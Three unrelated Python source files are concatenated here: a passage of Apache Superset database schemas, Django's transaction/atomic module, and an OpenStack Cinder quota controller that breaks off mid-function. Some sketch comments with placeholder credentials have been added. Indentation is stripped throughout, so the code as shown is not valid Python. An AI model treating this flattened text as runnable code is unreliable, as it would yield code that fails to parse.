"""
Build SQLAlchemy URI from separate parameters.
This is used for databases that support being configured by individual
        parameters (e.g., username, password, host, etc.), instead of requiring
the constructed SQLAlchemy URI to be passed.
"""
parameters = data.pop("parameters", {})
# TODO(AAfghahi) standardize engine.
engine = (
data.pop("engine", None)
or parameters.pop("engine", None)
or data.pop("backend", None)
)
configuration_method = data.get("configuration_method")
if configuration_method == ConfigurationMethod.DYNAMIC_FORM:
engine_spec = get_engine_spec(engine)
if not hasattr(engine_spec, "build_sqlalchemy_uri") or not hasattr(
engine_spec, "parameters_schema"
):
raise ValidationError(
[
_(
'Engine spec "InvalidEngine" does not support '
"being configured via individual parameters."
)
]
)
# validate parameters
parameters = engine_spec.parameters_schema.load(parameters) # type: ignore
serialized_encrypted_extra = data.get("encrypted_extra") or "{}"
try:
encrypted_extra = json.loads(serialized_encrypted_extra)
except json.decoder.JSONDecodeError:
encrypted_extra = {}
data["sqlalchemy_uri"] = engine_spec.build_sqlalchemy_uri( # type: ignore
parameters, encrypted_extra
)
return data
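# Illustrative sketch (hypothetical payload, not part of the original module):
# when ``configuration_method`` is DYNAMIC_FORM, the ``@pre_load`` hook above
# collapses the separate parameters into ``sqlalchemy_uri`` before the schema
# fields are deserialized. Assuming an engine spec such as Postgres that
# supports the dynamic form:
#
#     data = {
#         "engine": "postgresql",
#         "configuration_method": ConfigurationMethod.DYNAMIC_FORM,
#         "parameters": {
#             "username": "admin",
#             "password": "secret",
#             "host": "db.example.com",
#             "port": 5432,
#             "database": "examples",
#         },
#     }
#     # After the hook runs, data["sqlalchemy_uri"] would be something like
#     # "postgresql://admin:secret@db.example.com:5432/examples".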
def get_engine_spec(engine: Optional[str]) -> Type[BaseEngineSpec]:
if not engine:
raise ValidationError(
[
_(
"An engine must be specified when passing "
"individual parameters to a database."
)
]
)
engine_specs = get_engine_specs()
if engine not in engine_specs:
raise ValidationError(
[_('Engine "%(engine)s" is not a valid engine.', engine=engine,)]
)
return engine_specs[engine]
class DatabaseValidateParametersSchema(Schema):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
engine = fields.String(required=True, description="SQLAlchemy engine to use")
parameters = fields.Dict(
keys=fields.String(),
values=fields.Raw(allow_none=True),
description="DB-specific parameters for configuration",
)
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
extra = fields.String(description=extra_description, validate=extra_validator)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
configuration_method = EnumField(
ConfigurationMethod,
by_value=True,
required=True,
description=configuration_method_description,
)
class DatabasePostSchema(Schema, DatabaseParametersSchemaMixin):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
database_name = fields.String(
description=database_name_description, required=True, validate=Length(1, 250),
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
expose_in_sqllab = fields.Boolean(description=expose_in_sqllab_description)
allow_run_async = fields.Boolean(description=allow_run_async_description)
allow_file_upload = fields.Boolean(description=allow_file_upload_description)
allow_ctas = fields.Boolean(description=allow_ctas_description)
allow_cvas = fields.Boolean(description=allow_cvas_description)
allow_dml = fields.Boolean(description=allow_dml_description)
force_ctas_schema = fields.String(
description=force_ctas_schema_description,
allow_none=True,
validate=Length(0, 250),
)
allow_multi_schema_metadata_fetch = fields.Boolean(
description=allow_multi_schema_metadata_fetch_description,
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
extra = fields.String(description=extra_description, validate=extra_validator)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(1, 1024), sqlalchemy_uri_validator],
)
class DatabasePutSchema(Schema, DatabaseParametersSchemaMixin):
class Meta: # pylint: disable=too-few-public-methods
unknown = EXCLUDE
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
cache_timeout = fields.Integer(
description=cache_timeout_description, allow_none=True
)
expose_in_sqllab = fields.Boolean(description=expose_in_sqllab_description)
allow_run_async = fields.Boolean(description=allow_run_async_description)
allow_file_upload = fields.Boolean(description=allow_file_upload_description)
allow_ctas = fields.Boolean(description=allow_ctas_description)
allow_cvas = fields.Boolean(description=allow_cvas_description)
allow_dml = fields.Boolean(description=allow_dml_description)
force_ctas_schema = fields.String(
description=force_ctas_schema_description,
allow_none=True,
validate=Length(0, 250),
)
allow_multi_schema_metadata_fetch = fields.Boolean(
description=allow_multi_schema_metadata_fetch_description
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
encrypted_extra = fields.String(
description=encrypted_extra_description,
allow_none=True,
validate=encrypted_extra_validator,
)
extra = fields.String(description=extra_description, validate=extra_validator)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(0, 1024), sqlalchemy_uri_validator],
)
class DatabaseTestConnectionSchema(Schema, DatabaseParametersSchemaMixin):
database_name = fields.String(
description=database_name_description, allow_none=True, validate=Length(1, 250),
)
impersonate_user = fields.Boolean(description=impersonate_user_description)
extra = fields.String(description=extra_description, validate=extra_validator)
encrypted_extra = fields.String(
description=encrypted_extra_description,
validate=encrypted_extra_validator,
allow_none=True,
)
server_cert = fields.String(
description=server_cert_description,
allow_none=True,
validate=server_cert_validator,
)
sqlalchemy_uri = fields.String(
description=sqlalchemy_uri_description,
validate=[Length(1, 1024), sqlalchemy_uri_validator],
)
class TableMetadataOptionsResponseSchema(Schema):
deferrable = fields.Bool()
initially = fields.Bool()
match = fields.Bool()
ondelete = fields.Bool()
onupdate = fields.Bool()
class TableMetadataColumnsResponseSchema(Schema):
keys = fields.List(fields.String(), description="")
longType = fields.String(description="The actual backend long type for the column")
name = fields.String(description="The column name")
type = fields.String(description="The column type")
duplicates_constraint = fields.String(required=False)
class TableMetadataForeignKeysIndexesResponseSchema(Schema):
column_names = fields.List(
fields.String(
description="A list of column names that compose the foreign key or index"
)
)
name = fields.String(description="The name of the foreign key or index")
options = fields.Nested(TableMetadataOptionsResponseSchema)
referred_columns = fields.List(fields.String())
referred_schema = fields.String()
referred_table = fields.String()
type = fields.String()
class TableMetadataPrimaryKeyResponseSchema(Schema):
column_names = fields.List(
fields.String(description="A list of column names that compose the primary key")
)
name = fields.String(description="The primary key index name")
type = fields.String()
class TableMetadataResponseSchema(Schema):
name = fields.String(description="The name of the table")
columns = fields.List(
fields.Nested(TableMetadataColumnsResponseSchema),
description="A list of columns and their metadata",
)
foreignKeys = fields.List(
fields.Nested(TableMetadataForeignKeysIndexesResponseSchema),
description="A list of foreign keys and their metadata",
)
indexes = fields.List(
fields.Nested(TableMetadataForeignKeysIndexesResponseSchema),
description="A list of indexes and their metadata",
)
primaryKey = fields.Nested(
TableMetadataPrimaryKeyResponseSchema, description="Primary keys metadata"
)
selectStar = fields.String(description="SQL select star")
class SelectStarResponseSchema(Schema):
result = fields.String(description="SQL select star")
class SchemasResponseSchema(Schema):
result = fields.List(fields.String(description="A database schema name"))
class DatabaseRelatedChart(Schema):
id = fields.Integer()
slice_name = fields.String()
viz_type = fields.String()
class DatabaseRelatedDashboard(Schema):
id = fields.Integer()
json_metadata = fields.Dict()
slug = fields.String()
title = fields.String()
class DatabaseRelatedCharts(Schema):
count = fields.Integer(description="Chart count")
result = fields.List(
        fields.Nested(DatabaseRelatedChart), description="A list of charts"
)
class DatabaseRelatedDashboards(Schema):
count = fields.Integer(description="Dashboard count")
result = fields.List(
fields.Nested(DatabaseRelatedDashboard), description="A list of dashboards"
)
class DatabaseRelatedObjectsResponse(Schema):
charts = fields.Nested(DatabaseRelatedCharts)
dashboards = fields.Nested(DatabaseRelatedDashboards)
class DatabaseFunctionNamesResponse(Schema):
function_names = fields.List(fields.String())
class ImportV1DatabaseExtraSchema(Schema):
# pylint: disable=no-self-use, unused-argument
@pre_load
def fix_schemas_allowed_for_csv_upload(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
"""
Fixes for ``schemas_allowed_for_csv_upload``.
"""
# Fix for https://github.com/apache/superset/pull/16756, which temporarily
# changed the V1 schema. We need to support exports made after that PR and
# before this PR.
if "schemas_allowed_for_file_upload" in data:
data["schemas_allowed_for_csv_upload"] = data.pop(
"schemas_allowed_for_file_upload"
)
# Fix ``schemas_allowed_for_csv_upload`` being a string.
# Due to a bug in the database modal, some databases might have been
# saved and exported with a string for ``schemas_allowed_for_csv_upload``.
schemas_allowed_for_csv_upload = data.get("schemas_allowed_for_csv_upload")
if isinstance(schemas_allowed_for_csv_upload, str):
data["schemas_allowed_for_csv_upload"] = json.loads(
schemas_allowed_for_csv_upload
)
return data
metadata_params = fields.Dict(keys=fields.Str(), values=fields.Raw())
engine_params = fields.Dict(keys=fields.Str(), values=fields.Raw())
metadata_cache_timeout = fields.Dict(keys=fields.Str(), values=fields.Integer())
schemas_allowed_for_csv_upload = fields.List(fields.String())
cost_estimate_enabled = fields.Boolean()
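# Illustrative sketch (not part of the original module): the ``@pre_load`` hook
# above normalizes both export variants, e.g.
#
#     ImportV1DatabaseExtraSchema().load(
#         {"schemas_allowed_for_file_upload": ["public"]}
#     )
#     # -> {"schemas_allowed_for_csv_upload": ["public"]}
#
#     ImportV1DatabaseExtraSchema().load(
#         {"schemas_allowed_for_csv_upload": '["public", "staging"]'}
#     )
#     # -> {"schemas_allowed_for_csv_upload": ["public", "staging"]}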
class ImportV1DatabaseSchema(Schema):
# pylint: disable=no-self-use, unused-argument
@pre_load
def fix_allow_csv_upload(
self, data: Dict[str, Any], **kwargs: Any
) -> Dict[str, Any]:
"""
        Fix for ``allow_csv_upload``.
"""
# Fix for https://github.com/apache/superset/pull/16756, which temporarily
# changed the V1 schema. We need to support exports made after that PR and
# before this PR.
if "allow_file_upload" in data:
data["allow_csv_upload"] = data.pop("allow_file_upload")
return data
database_name = fields.String(required=True)
sqlalchemy_uri = fields.String(required=True)
password = fields.String(allow_none=True)
cache_timeout = fields.Integer(allow_none=True)
expose_in_sqllab = fields.Boolean()
allow_run_async = fields.Boolean()
allow_ctas = fields.Boolean()
allow_cvas = fields.Boolean()
allow_csv_upload = fields.Boolean()
extra = fields.Nested(ImportV1DatabaseExtraSchema)
uuid = fields.UUID(required=True)
version = fields.String(required=True)
# pylint: disable=no-self-use, unused-argument
@validates_schema
def validate_password(self, data: Dict[str, Any], **kwargs: Any) -> None:
"""If sqlalchemy_uri has a masked password, password is required"""
uuid = data["uuid"]
existing = db.session.query(Database).filter_by(uuid=uuid).first()
if existing:
return
uri = data["sqlalchemy_uri"]
password = make_url(uri).password
if password == PASSWORD_MASK and data.get("password") is None:
raise ValidationError("Must provide a password for the database")
class EncryptedField: # pylint: disable=too-few-public-methods
"""
A database field that should be stored in encrypted_extra.
"""
class EncryptedString(EncryptedField, fields.String):
pass
class EncryptedDict(EncryptedField, fields.Dict):
pass
def encrypted_field_properties(self, field: Any, **_) -> Dict[str, Any]: # type: ignore
ret = {}
if isinstance(field, EncryptedField):
if self.openapi_version.major > 2:
ret["x-encrypted-extra"] = True
return ret
|
|
from django.db import (
DEFAULT_DB_ALIAS, DatabaseError, Error, ProgrammingError, connections,
)
from django.utils.decorators import ContextDecorator
class TransactionManagementError(ProgrammingError):
"""
This exception is thrown when transaction management is used improperly.
"""
pass
def get_connection(using=None):
"""
Get a database connection by name, or the default database connection
if no name is provided. This is a private API.
"""
if using is None:
using = DEFAULT_DB_ALIAS
return connections[using]
def get_autocommit(using=None):
"""
Get the autocommit status of the connection.
"""
return get_connection(using).get_autocommit()
def set_autocommit(autocommit, using=None):
"""
Set the autocommit status of the connection.
"""
return get_connection(using).set_autocommit(autocommit)
def commit(using=None):
"""
Commits a transaction.
"""
get_connection(using).commit()
def rollback(using=None):
"""
Rolls back a transaction.
"""
get_connection(using).rollback()
def savepoint(using=None):
"""
Creates a savepoint (if supported and required by the backend) inside the
current transaction. Returns an identifier for the savepoint that will be
used for the subsequent rollback or commit.
"""
return get_connection(using).savepoint()
def savepoint_rollback(sid, using=None):
"""
Rolls back the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
get_connection(using).savepoint_rollback(sid)
def savepoint_commit(sid, using=None):
"""
Commits the most recent savepoint (if one exists). Does nothing if
savepoints are not supported.
"""
get_connection(using).savepoint_commit(sid)
def clean_savepoints(using=None):
"""
Resets the counter used to generate unique savepoint ids in this thread.
"""
get_connection(using).clean_savepoints()
def get_rollback(using=None):
"""
Gets the "needs rollback" flag -- for *advanced use* only.
"""
return get_connection(using).get_rollback()
def set_rollback(rollback, using=None):
"""
Sets or unsets the "needs rollback" flag -- for *advanced use* only.
When `rollback` is `True`, it triggers a rollback when exiting the
innermost enclosing atomic block that has `savepoint=True` (that's the
default). Use this to force a rollback without raising an exception.
When `rollback` is `False`, it prevents such a rollback. Use this only
after rolling back to a known-good state! Otherwise, you break the atomic
block and data corruption may occur.
"""
return get_connection(using).set_rollback(rollback)
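# Illustrative sketch (not part of Django itself; helper names are placeholders):
# set_rollback(True) is how application code forces the surrounding atomic block
# to roll back without raising an exception.
#
#     from django.db import transaction
#
#     with transaction.atomic():
#         do_some_writes()
#         if something_went_wrong():
#             transaction.set_rollback(True)   # exits normally, then rolls back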
#################################
# Decorators / context managers #
#################################
class Atomic(ContextDecorator):
"""
This class guarantees the atomic execution of a given block.
An instance can be used either as a decorator or as a context manager.
When it's used as a decorator, __call__ wraps the execution of the
decorated function in the instance itself, used as a context manager.
When it's used as a context manager, __enter__ creates a transaction or a
savepoint, depending on whether a transaction is already in progress, and
__exit__ commits the transaction or releases the savepoint on normal exit,
and rolls back the transaction or to the savepoint on exceptions.
It's possible to disable the creation of savepoints if the goal is to
ensure that some code runs within a transaction without creating overhead.
A stack of savepoints identifiers is maintained as an attribute of the
connection. None denotes the absence of a savepoint.
This allows reentrancy even if the same AtomicWrapper is reused. For
    example, it's possible to define `oa = atomic('other')` and use `@oa` or
`with oa:` multiple times.
Since database connections are thread-local, this is thread-safe.
This is a private API.
"""
def __init__(self, using, savepoint):
self.using = using
self.savepoint = savepoint
def __enter__(self):
connection = get_connection(self.using)
if not connection.in_atomic_block:
# Reset state when entering an outermost atomic block.
connection.commit_on_exit = True
connection.needs_rollback = False
if not connection.get_autocommit():
# Some database adapters (namely sqlite3) don't handle
# transactions and savepoints properly when autocommit is off.
# Turning autocommit back on isn't an option; it would trigger
# a premature commit. Give up if that happens.
if connection.features.autocommits_when_autocommit_is_off:
raise TransactionManagementError(
"Your database backend doesn't behave properly when "
"autocommit is off. Turn it on before using 'atomic'.")
# When entering an atomic block with autocommit turned off,
# Django should only use savepoints and shouldn't commit.
# This requires at least a savepoint for the outermost block.
if not self.savepoint:
raise TransactionManagementError(
"The outermost 'atomic' block cannot use "
"savepoint = False when autocommit is off.")
# Pretend we're already in an atomic block to bypass the code
# that disables autocommit to enter a transaction, and make a
# note to deal with this case in __exit__.
connection.in_atomic_block = True
connection.commit_on_exit = False
if connection.in_atomic_block:
# We're already in a transaction; create a savepoint, unless we
# were told not to or we're already waiting for a rollback. The
# second condition avoids creating useless savepoints and prevents
# overwriting needs_rollback until the rollback is performed.
if self.savepoint and not connection.needs_rollback:
sid = connection.savepoint()
connection.savepoint_ids.append(sid)
else:
connection.savepoint_ids.append(None)
else:
# We aren't in a transaction yet; create one.
# The usual way to start a transaction is to turn autocommit off.
# However, some database adapters (namely sqlite3) don't handle
# transactions and savepoints properly when autocommit is off.
# In such cases, start an explicit transaction instead, which has
# the side-effect of disabling autocommit.
if connection.features.autocommits_when_autocommit_is_off:
connection._start_transaction_under_autocommit()
connection.autocommit = False
else:
connection.set_autocommit(False)
connection.in_atomic_block = True
def __exit__(self, exc_type, exc_value, traceback):
connection = get_connection(self.using)
if connection.savepoint_ids:
sid = connection.savepoint_ids.pop()
else:
# Prematurely unset this flag to allow using commit or rollback.
connection.in_atomic_block = False
try:
if connection.closed_in_transaction:
# The database will perform a rollback by itself.
# Wait until we exit the outermost block.
pass
elif exc_type is None and not connection.needs_rollback:
if connection.in_atomic_block:
# Release savepoint if there is one
if sid is not None:
try:
connection.savepoint_commit(sid)
except DatabaseError:
try:
connection.savepoint_rollback(sid)
# The savepoint won't be reused. Release it to
# minimize overhead for the database server.
connection.savepoint_commit(sid)
except Error:
# If rolling back to a savepoint fails, mark for
# rollback at a higher level and avoid shadowing
# the original exception.
connection.needs_rollback = True
raise
else:
# Commit transaction
try:
connection.commit()
except DatabaseError:
try:
connection.rollback()
except Error:
# An error during rollback means that something
# went wrong with the connection. Drop it.
connection.close()
raise
else:
# This flag will be set to True again if there isn't a savepoint
# allowing to perform the rollback at this level.
connection.needs_rollback = False
if connection.in_atomic_block:
# Roll back to savepoint if there is one, mark for rollback
# otherwise.
if sid is None:
connection.needs_rollback = True
else:
try:
connection.savepoint_rollback(sid)
# The savepoint won't be reused. Release it to
# minimize overhead for the database server.
connection.savepoint_commit(sid)
except Error:
# If rolling back to a savepoint fails, mark for
# rollback at a higher level and avoid shadowing
# the original exception.
connection.needs_rollback = True
else:
# Roll back transaction
try:
connection.rollback()
except Error:
# An error during rollback means that something
# went wrong with the connection. Drop it.
connection.close()
finally:
# Outermost block exit when autocommit was enabled.
if not connection.in_atomic_block:
if connection.closed_in_transaction:
connection.connection = None
elif connection.features.autocommits_when_autocommit_is_off:
connection.autocommit = True
else:
connection.set_autocommit(True)
# Outermost block exit when autocommit was disabled.
elif not connection.savepoint_ids and not connection.commit_on_exit:
if connection.closed_in_transaction:
connection.connection = None
else:
connection.in_atomic_block = False
def atomic(using=None, savepoint=True):
# Bare decorator: @atomic -- although the first argument is called
# `using`, it's actually the function being decorated.
if callable(using):
return Atomic(DEFAULT_DB_ALIAS, savepoint)(using)
# Decorator: @atomic(...) or context manager: with atomic(...): ...
else:
return Atomic(using, savepoint)
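# Illustrative sketch (not part of Django itself; the models and the "replica"
# alias are placeholders): ``atomic`` works as a bare decorator, a parametrized
# decorator, or a context manager, and nested blocks become savepoints.
#
#     from django.db import transaction
#
#     @transaction.atomic                      # bare decorator
#     def create_parent_and_child():
#         parent = Parent.objects.create()
#         with transaction.atomic():           # nested block -> savepoint
#             Child.objects.create(parent=parent)
#
#     with transaction.atomic(using="replica", savepoint=False):
#         ...                                  # explicit database, no savepoint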
def _non_atomic_requests(view, using):
try:
view._non_atomic_requests.add(using)
except AttributeError:
view._non_atomic_requests = {using}
return view
def non_atomic_requests(using=None):
if callable(using):
return _non_atomic_requests(using, DEFAULT_DB_ALIAS)
else:
if using is None:
using = DEFAULT_DB_ALIAS
return lambda view: _non_atomic_requests(view, using)
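# Illustrative sketch (not part of Django itself; view names and the "analytics"
# alias are placeholders): ``non_atomic_requests`` opts a view out of
# ATOMIC_REQUESTS handling for one or more databases.
#
#     from django.db import transaction
#
#     @transaction.non_atomic_requests              # default database
#     def streaming_view(request):
#         ...
#
#     @transaction.non_atomic_requests(using="analytics")
#     def reporting_view(request):
#         ...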
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import webob
from oslo_utils import strutils
from cinder.api import extensions
from cinder.api.openstack import wsgi
from cinder import db
from cinder.db.sqlalchemy import api as sqlalchemy_api
from cinder import exception
from cinder.i18n import _
from cinder import quota
from cinder import quota_utils
from cinder import utils
QUOTAS = quota.QUOTAS
NON_QUOTA_KEYS = ['tenant_id', 'id']
authorize_update = extensions.extension_authorizer('volume', 'quotas:update')
authorize_show = extensions.extension_authorizer('volume', 'quotas:show')
authorize_delete = extensions.extension_authorizer('volume', 'quotas:delete')
class QuotaSetsController(wsgi.Controller):
def _format_quota_set(self, project_id, quota_set):
"""Convert the quota object to a result dict."""
quota_set['id'] = str(project_id)
return dict(quota_set=quota_set)
def _validate_existing_resource(self, key, value, quota_values):
# -1 limit will always be greater than the existing value
if key == 'per_volume_gigabytes' or value == -1:
return
v = quota_values.get(key, {})
used = (v.get('in_use', 0) + v.get('reserved', 0))
if QUOTAS.using_nested_quotas():
used += v.get('allocated', 0)
if value < used:
# TODO(mc_nair): after N opens, update error message to include
# the current usage and requested limit
msg = _("Quota %s limit must be equal or greater than existing "
"resources.") % key
raise webob.exc.HTTPBadRequest(explanation=msg)
def _get_quotas(self, context, id, usages=False):
values = QUOTAS.get_project_quotas(context, id, usages=usages)
if usages:
return values
else:
return {k: v['limit'] for k, v in values.items()}
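    # Illustrative sketch (values are made up): with usages=False the method
    # returns bare limits; with usages=True it returns the full usage dicts.
    #
    #     self._get_quotas(context, project_id)
    #     # -> {'volumes': 10, 'gigabytes': 1000, ...}
    #     self._get_quotas(context, project_id, usages=True)
    #     # -> {'volumes': {'limit': 10, 'in_use': 3, 'reserved': 0}, ...}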
def _authorize_update_or_delete(self, context_project,
target_project_id,
parent_id):
"""Checks if update or delete are allowed in the current hierarchy.
With hierarchical projects, only the admin of the parent or the root
project has privilege to perform quota update and delete operations.
:param context_project: The project in which the user is scoped to.
:param target_project_id: The id of the project in which the
user want to perform an update or
delete operation.
:param parent_id: The parent id of the project in which the user
want to perform an update or delete operation.
"""
if context_project.is_admin_project:
# The calling project has admin privileges and should be able
# to operate on all quotas.
return
if context_project.parent_id and parent_id != context_project.id:
msg = _("Update and delete quota operations can only be made "
"by an admin of immediate parent or by the CLOUD admin.")
raise webob.exc.HTTPForbidden(explanation=msg)
if context_project.id != target_project_id:
if not self._is_descendant(target_project_id,
context_project.subtree):
msg = _("Update and delete quota operations can only be made "
"to projects in the same hierarchy of the project in "
"which users are scoped to.")
raise webob.exc.HTTPForbidden(explanation=msg)
else:
msg = _("Update and delete quota operations can only be made "
"by an admin of immediate parent or by the CLOUD admin.")
raise webob.exc.HTTPForbidden(explanation=msg)
def _authorize_show(self, context_project, target_project):
"""Checks if show is allowed in the current hierarchy.
With hierarchical projects, users are allowed to perform a quota show
operation if they have the cloud admin role or if they belong to at
least one of the following projects: the target project, its immediate
parent project, or the root project of its hierarchy.
:param context_project: The project in which the user
is scoped to.
:param target_project: The project in which the user wants
to perform a show operation.
"""
if context_project.is_admin_project:
# The calling project has admin privileges and should be able
# to view all quotas.
return
if target_project.parent_id:
if target_project.id != context_project.id:
if not self._is_descendant(target_project.id,
context_project.subtree):
msg = _("Show operations can only be made to projects in "
"the same hierarchy of the project in which users "
"are scoped to.")
raise webob.exc.HTTPForbidden(explanation=msg)
if context_project.id != target_project.parent_id:
if context_project.parent_id:
msg = _("Only users with token scoped to immediate "
"parents or root projects are allowed to see "
"its children quotas.")
raise webob.exc.HTTPForbidden(explanation=msg)
elif context_project.parent_id:
msg = _("An user with a token scoped to a subproject is not "
"allowed to see the quota of its parents.")
raise webob.exc.HTTPForbidden(explanation=msg)
def _is_descendant(self, target_project_id, subtree):
if subtree is not None:
for key, value in subtree.items():
if key == target_project_id:
return True
if self._is_descendant(target_project_id, value):
return True
return False
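    # Illustrative sketch (made-up project ids): ``subtree`` is the nested dict
    # of child project ids returned by Keystone, so descendant checks recurse
    # through every level.
    #
    #     subtree = {"b1": {}, "b2": {"c3": {}}}
    #     self._is_descendant("c3", subtree)   # True  (grandchild of the scope)
    #     self._is_descendant("d4", subtree)   # False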
def show(self, req, id):
"""Show quota for a particular tenant
This works for hierarchical and non-hierarchical projects. For
hierarchical projects admin of current project, immediate
parent of the project or the CLOUD admin are able to perform
a show.
:param req: request
:param id: target project id that needs to be shown
"""
context = req.environ['cinder.context']
authorize_show(context)
params = req.params
target_project_id = id
if not hasattr(params, '__call__') and 'usage' in params:
usage = utils.get_bool_param('usage', params)
else:
usage = False
if QUOTAS.using_nested_quotas():
# With hierarchical projects, only the admin of the current project
# or the root project has privilege to perform quota show
# operations.
target_project = quota_utils.get_project_hierarchy(
context, target_project_id)
context_project = quota_utils.get_project_hierarchy(
context, context.project_id, subtree_as_ids=True,
is_admin_project=context.is_admin)
self._authorize_show(context_project, target_project)
try:
sqlalchemy_api.authorize_project_context(context,
target_project_id)
except exception.NotAuthorized:
raise webob.exc.HTTPForbidden()
quotas = self._get_quotas(context, target_project_id, usage)
return self._format_quota_set(target_project_id, quotas)
def update(self, req, id, body):
"""Update Quota for a particular tenant
This works for hierarchical and non-hierarchical projects. For
hierarchical projects only immediate parent admin or the
CLOUD admin are able to perform an update.
:param req: request
:param id: target project id that needs to be updated
        :param body: key, value pair that will be
applied to the resources if the update
succeeds
"""
context = req.environ['cinder.context']
authorize_update(context)
self.validate_string_length(id, 'quota_set_name',
min_length=1, max_length=255)
self.assert_valid_body(body, 'quota_set')
# Get the optional argument 'skip_validation' from body,
# if skip_validation is False, then validate existing resource.
skip_flag = body.get('skip_validation', True)
if not utils.is_valid_boolstr(skip_flag):
msg = _("Invalid value '%s' for skip_validation.") % skip_flag
raise exception.InvalidParameterValue(err=msg)
skip_flag = strutils.bool_from_string(skip_flag)
target_project_id = id
bad_keys = []
# NOTE(ankit): Pass #1 - In this loop for body['quota_set'].items(),
# we figure out if we have any bad keys.
for key, value in body['quota_set'].items():
if (key not in QUOTAS and key not in NON_QUOTA_KEYS):
bad_keys.append(key)
continue
if len(bad_keys) > 0:
msg = _("Bad key(s) in quota set: %s") % ",".join(bad_keys)
raise webob.exc.HTTPBadRequest(explanation=msg)
# Saving off this value since we need to use it multiple times
use_nested_quotas = QUOTAS.using_nested_quotas()
if use_nested_quotas:
# Get the parent_id of the target project to verify whether we are
# dealing with hierarchical namespace or non-hierarchical namespace
target_project = quota_utils.get_project_hierarchy(
context, target_project_id, parents_as_ids=True)
parent_id = target_project.parent_id
if parent_id:
# Get the children of the project which the token is scoped to
# in order to know if the target_project is in its hierarchy.
context_project = quota_utils.get_project_hierarchy(
context, context.project_id, subtree_as_ids=True,
is_admin_project=context.is_admin)
self._authorize_update_or_delete(context_project,
target_project.id,
parent_id)
# NOTE(ankit): Pass #2 - In this loop for body['quota_set'].keys(),
# we validate the quota limits to ensure that we can bail out if
# any of the items in the set is bad. Meanwhile we validate value
# to ensure that the value can't be lower than number of existing
# resources.
quota_values = QUOTAS.get_project_quotas(context, target_project_id,
defaults=False)
valid_quotas = {}
reservations = []
for key in body['quota_set'].keys():
if key in NON_QUOTA_KEYS:
continue
value = utils.validate_integer(
body['quota_set'][key], key, min_value=-1,
max_value=db.MAX_INT)
# Can't skip the validation of nested quotas since it could mess up
            # hierarchy if parent limit is less than children's current usage
if not skip_flag or use_nested_quotas:
self._validate_existing_resource(key, value, quota_values)
if use_nested_quotas:
try:
reservations += self._update_nested_quota_allocated(
context, target_project, quota_values, key, value)
except exception.OverQuota as e:
if reservations:
db.reservation_rollback(context, reservations)
raise webob.exc.HTTPBadRequest(explanation=e.msg)
valid_quotas[key] = value
# NOTE(ankit): Pass #3 - At this point we know that all the keys and
# values are valid and we can iterate and update them all in one shot
# without having to worry about rolling back etc as we have done
# the validation up front in the 2 loops above.
for key, value in valid_quotas.items():
try:
db.quota_update(context, target_project_id, key, value)
except exception.ProjectQuotaNotFound:
db.quota_create(context, target_project_id, key, value)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
if reservations:
db.reservation_commit(context, reservations)
return {'quota_set': self._get_quotas(context, target_project_id)}
def _get_quota_usage(self, quota_obj):
return (quota_obj.get('in_use', 0) + quota_obj.get('allocated', 0) +
quota_obj.get('reserved', 0))
def _update_nested_quota_allocated(self, ctxt, target_project,
target_project_quotas, res, new_limit):
reservations = []
# per_volume_gigabytes doesn't make sense to nest
if res == "per_volume_gigabytes":
return reservations
quota_for_res = target_project_quotas.get(res, {})
orig_quota_from_target_proj = quota_for_res.get('limit', 0)
# If limit was -1, we were "taking" current child's usage from parent
if orig_quota_from_target_proj == -1:
orig_quota_from_target_proj = self._get_quota_usage(quota_for_res)
new_quota_from_target_proj = new_limit
# If we set limit to -1, we will "take" the current usage from parent
if new_limit == -1:
new_quota_from_target_proj = self._get_quota_usage(quota_for_res)
res_change = new_quota_from_target_proj - orig_quota_from_target_proj
if res_change != 0:
deltas = {res: res_change}
reservations += quota_utils.update_alloc_to_next_hard_limit(
ctxt, QUOTAS.resources, deltas, res, None, target_project.id)
return reservations
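    # Illustrative sketch (made-up numbers): raising a child's 'gigabytes' limit
    # from 500 to 800 gives res_change = 300, so 300 more GB are reserved as
    # 'allocated' against the parent hierarchy; lowering the limit produces a
    # negative delta and hands that allocation back to the parent.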
def defaults(self, req, id):
context = req.environ['cinder.context']
authorize_show(context)
return self._format_quota_set(id, QUOTAS.get_defaults(
context, project_id=id))
def delete(self, req, id):
"""Delete Quota for a particular tenant.
        This works for hierarchical and non-hierarchical projects. For
        hierarchical projects, only the immediate parent admin or the
        CLOUD admin are able to perform a delete.
:param req: request
:param id: target project id that needs to be deleted
"""
context = req.environ['cinder.context']
authorize_delete(context)
if QUOTAS.using_nested_quotas():
self._delete_nested_quota(context, id)
else:
try:
db.quota_destroy_by_project(context, id)
except exception.AdminRequired:
raise webob.exc.HTTPForbidden()
def _delete_nested_quota(self, ctxt, proj_id):
# Get the parent_id of the target project to verify whether we are
# dealing with hierarchical namespace or non-hierarchical
# namespace.
try:
project_quotas = QUOTAS.get_project_quotas(
ctxt, proj_id, usages=True, defaults=False)
except exception.NotAuthorized:
raise webob.exc.HTTPForbidden()
